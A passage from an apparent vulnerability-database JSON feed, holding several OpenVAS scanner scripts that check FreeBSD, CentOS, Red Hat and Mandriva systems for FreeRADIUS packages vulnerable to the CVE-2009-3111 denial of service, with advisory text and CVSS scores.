script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"freeradius\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.8\")<0) {\n txt += 'Package freeradius version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880824", "type": "openvas", "title": "CentOS Update for freeradius CESA-2009:1451 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for freeradius CESA-2009:1451 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880824\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2009:1451\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_name(\"CentOS Update for freeradius CESA-2009:1451 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'freeradius'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"freeradius on CentOS 5\");\n script_tag(name:\"insight\", value:\"FreeRADIUS is a high-performance and highly configurable free Remote\n Authentication Dial In User Service (RADIUS) server, designed to allow\n centralized authentication and authorization for a network.\n\n An input validation flaw was discovered in the way FreeRADIUS decoded\n specific RADIUS attributes from RADIUS packets. A remote attacker could use\n this flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\n RADIUS packet. (CVE-2009-3111)\n\n Users of FreeRADIUS are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. After installing the\n update, radiusd will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-04-06T11:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "modified": "2018-04-06T00:00:00", "published": "2009-09-21T00:00:00", "id": "OPENVAS:136141256231064905", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064905", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1451", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1451.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64905\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-debuginfo\", rpm:\"freeradius-debuginfo~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-03-21T00:00:00", "published": "2009-12-30T00:00:00", "id": "OPENVAS:66614", "href": "http://plugins.openvas.org/nasl.php?oid=66614", "type": "openvas", "title": "FreeBSD Ports: freeradius", "sourceData": "#\n#VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: freeradius\n\nCVE-2009-3111\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(66614);\n script_version(\"$Revision: 5656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-21 12:03:12 +0100 (Tue, 21 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-3111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: freeradius\");\n\n script_xref(name:\"URL\", value:\"http://freeradius.org/security.html\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9642\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"freeradius\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.8\")<0) {\n txt += 'Package freeradius version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:04:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "Check for the Version of freeradius", "modified": "2018-01-17T00:00:00", "published": "2010-01-15T00:00:00", "id": "OPENVAS:1361412562310830798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830798", "type": "openvas", "title": "Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in freeradius:\n\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\n attackers to cause a denial of service (radiusd crash) via zero-length\n Tunnel-Password attributes. NOTE: this is a regression error related\n to CVE-2003-0967 (CVE-2009-3111).\n \n This update provides a solution to this vulnerability.\n \n Update:\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"freeradius on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00022.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830798\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2009:227-1\");\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_name(\"Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1\", rpm:\"libfreeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-devel\", rpm:\"libfreeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-krb5\", rpm:\"libfreeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-ldap\", rpm:\"libfreeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-mysql\", rpm:\"libfreeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-postgresql\", rpm:\"libfreeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-unixODBC\", rpm:\"libfreeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1\", rpm:\"lib64freeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-devel\", rpm:\"lib64freeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-krb5\", rpm:\"lib64freeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-ldap\", rpm:\"lib64freeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-mysql\", rpm:\"lib64freeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-postgresql\", rpm:\"lib64freeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-unixODBC\", rpm:\"lib64freeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066166", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066166", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1451 (freeradius)", "sourceData": "#CESA-2009:1451 66166 2\n# $Id: ovcesa2009_1451.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1451 (freeradius)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1451\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1451\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html\";\ntag_summary = \"The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66166\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1451 (freeradius)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.", "modified": "2017-07-10T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66166", "href": "http://plugins.openvas.org/nasl.php?oid=66166", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1451 (freeradius)", "sourceData": "#CESA-2009:1451 66166 2\n# $Id: ovcesa2009_1451.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1451 (freeradius)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1451\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1451\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html\";\ntag_summary = \"The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.\";\n\n\n\nif(description)\n{\n script_id(66166);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1451 (freeradius)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", 